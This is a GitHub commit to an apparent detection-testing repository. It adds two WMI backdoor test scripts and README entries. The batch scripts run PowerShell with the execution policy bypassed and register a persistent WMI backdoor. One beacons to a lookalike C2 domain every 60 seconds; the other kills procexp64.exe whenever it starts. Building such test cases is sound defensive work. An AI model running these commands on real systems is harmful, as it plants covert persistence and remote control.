Skip to content

Commit 48db052

Browse files
author
Florian Roth
committed
Two new WMI backdoor tests (by Will Graeber @mattifestation)
https://github.com/mattifestation/WMI_Backdoor/
1 parent ed50272 commit 48db052

File tree

4 files changed

+618
-0
lines changed

4 files changed

+618
-0
lines changed

README.md

+10
Original file line numberDiff line numberDiff line change
@@ -81,6 +81,7 @@ The following table shows the different test cases and the expected detection re
8181
| DNS Cache 1 (Cache Injection) | (X) | X | | X | X |
8282
| Malicious User Agents (Malware, RATs) | | X | X | X | |
8383
| Ncat Back Connect (Drop & Exec) | X | | X | X | X |
84+
| WMI Backdoor C2 | | | X | X | X |
8485
| LSASS Dump (with Procdump) | | | X | X | X |
8586
| Mimikatz 1 (Drop & Exec) | X | | X | X | X |
8687
| WCE 1 (Eventlog entries) | | | X | X | X |
@@ -98,6 +99,7 @@ The following table shows the different test cases and the expected detection re
9899
| Scheduled Task Creation | | | X | X | X |
99100
| StickyKey Backdoor | | | X | | X |
100101
| Web Shells | X | | (X) | | X |
102+
| WMI Backdoor | | | X | | X |
101103

102104
# Test Sets
103105

@@ -126,6 +128,10 @@ The following table shows the different test cases and the expected detection re
126128

127129
- Drops a PowerShell Ncat alternative to the working directory and runs it to back connect to a well-known attacker domain
128130

131+
### WMI Backdoor
132+
133+
- Using Matt Graeber's [WMIBackdoor](https://github.com/mattifestation/WMI_Backdoor/) to kill local procexp64.exe when it starts
134+
129135
## Credential Access
130136

131137
### LSASS DUMP
@@ -220,6 +226,10 @@ No test cases yet
220226
- Drops standard web shells to that diretory
221227
- Drops GIF obfuscated web shell to that diretory
222228

229+
### WMI Backdoor
230+
231+
- Using Matt Graeber's [WMIBackdoor](https://github.com/mattifestation/WMI_Backdoor/) to kill local procexp64.exe when it starts
232+
223233
# Warning
224234

225235
This repo contains tools and executables that can harm your system's integrity and stability. Do only use them on non-productive test or demo systems.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
@ECHO OFF
2+
3+
ECHO ===========================================================================
4+
ECHO WMI Backdoor C2
5+
ECHO.
6+
ECHO Using Matt Graeber's WMIBackdoor to contact a C2 in certain intervals
7+
ping -n 5 127.0.0.1 > NUL
8+
9+
"%ZIP%" e -p%PASS% %TOOLARCH% -aoa -o"%APTDIR%" toolset\WMIBackdoor.ps1 > NUL
10+
11+
powershell.exe -Exec ByPasS ". %APTDIR%\WMIBackdoor.ps1;$Trigger2=New-WMIBackdoorTrigger -TimingInterval 60;$Action2=New-WMIBackdoorAction -C2Uri 'http://googleaccountsservices.com' -Backdoor; $Registration2=Register-WMIBackdoor -Trigger $Trigger2 -Action $Action2"
+11
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
@ECHO OFF
2+
3+
ECHO ===========================================================================
4+
ECHO WMI Backdoor
5+
ECHO.
6+
ECHO Using Matt Graeber's WMIBackdoor to kill local procexp64.exe when it starts
7+
ping -n 5 127.0.0.1 > NUL
8+
9+
"%ZIP%" e -p%PASS% %TOOLARCH% -aoa -o"%APTDIR%" toolset\WMIBackdoor.ps1 > NUL
10+
11+
powershell.exe -Exec ByPasS ". %APTDIR%\WMIBackdoor.ps1;$Trigger1=New-WMIBackdoorTrigger -ProcessName 'procexp64.exe';$Action1=New-WMIBackdoorAction -KillProcess; $Registration1=Register-WMIBackdoor -Trigger $Trigger1 -Action $Action1"

0 commit comments

Comments
 (0)